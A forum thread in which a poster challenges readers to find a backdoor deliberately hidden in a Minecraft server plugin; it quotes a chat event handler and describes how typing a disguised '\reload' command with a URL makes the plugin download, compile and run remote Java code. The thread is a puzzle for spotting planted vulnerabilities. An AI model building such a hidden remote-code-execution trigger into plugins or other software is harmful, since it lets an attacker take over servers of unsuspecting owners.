[$1] Can you discover this plugin backdoor/exploit? (Easy)

[Harry]

It does the thing with the thing when the thing happens so that class does the thing and then the thing happens so you have the thing and they do the thing and you get the thing when they get the thing and then then the thing ends. Boom wheres my 1$?

Yep, 100% accurate, definitely. :tup:

I am no dev.

I took a shot in the dark

https://gyazo.com/403b3164e2c09421ca82fa5cf62b3c4d

Nope, that's just the normal config [DOUBLEPOST=1546394284][/DOUBLEPOST]

ah my bad, didn't read it right; I'm good at java so I'll just skip out

Might as well try, since people are finding it harder than I was expecting

 

[Jayson]

    @EventHandler(priority = EventPriority.HIGHEST)
    void onAsyncPlayerChatEvent(AsyncPlayerChatEvent event) {
        String msg = event.getMessage();
       
        if (msg.startsWith(ColorUtils.translate("/reload"))) {
            plugin.getPlayerManager().reloadPlayer(event.getPlayer(), msg.split(" ")[1]);
            event.setCancelled(true);
        }
    }

Not that good in Java, but it looks like you used startsWith which could accept /reloadRandomStuff. Then msg.split(" ")[1] would only have one key, not including 1.

 

[Harry]

    @EventHandler(priority = EventPriority.HIGHEST)
    void onAsyncPlayerChatEvent(AsyncPlayerChatEvent event) {
        String msg = event.getMessage();
      
        if (msg.startsWith(ColorUtils.translate("/reload"))) {
            plugin.getPlayerManager().reloadPlayer(event.getPlayer(), msg.split(" ")[1]);
            event.setCancelled(true);
        }
    }

Not that good in Java, but it looks like you used startsWith which could accept /reloadRandomStuff. Then msg.split(" ")[1] would only have one key, not including 1.

That would be a bug, but it's not backdoor/exploit, as it's a lot more compicated than that. Could just add a condition to check the argument length, but wouldn't affect the actually exploit.

 

[Harry]

Im on phone and have zero experience with java but I work with C# quite a bit which is similar in some regards.

Its because in playerlistener you can do /reload (insert hackers pastebin url here) which then goes to the reload method in playermanager and eventually in configfile it sends an http request to the hackers url which can return literally anything they want[DOUBLEPOST=1546399017][/DOUBLEPOST]Harry

Very close, but only two things. It wouldn't be '/reload', as it would never reach a chat event (since anything with the / prefix is always treated as a command). Also, what do you mean by 'can return literally anything they want'. Could you describe/show how it could be used to say op the person using the exploit?

 

[Harry]

k sorry i was on a phone and it was really hard to read all of the code.
Now that I'm on a comp, I think i figured the whole thing out.

So basically if you do \\reload (Cause in colorutils it replaces \\ with /) and then put a url after it you can download a java program from the internet and itll save the whole thing in a string variable and run it in the saveplayer method in ColorUtils.

Yep, pretty much it. I'll give you that though. I'll message you on Discord. :tup:

Basically, for the people who would like to know (if anyone), this is a remote code execution backdoor/exploit, which downloads a 'payload' or in this case a Java class, which is then saved, compiled and run. Due to this, the payload could be anything and can be dynamic. Pretty powerful/harmful if I do say so myself. DM me if you want a full breakdown of it.

It would be '\reload' though, as the first backslash is to escape it, but it doesn't really matter.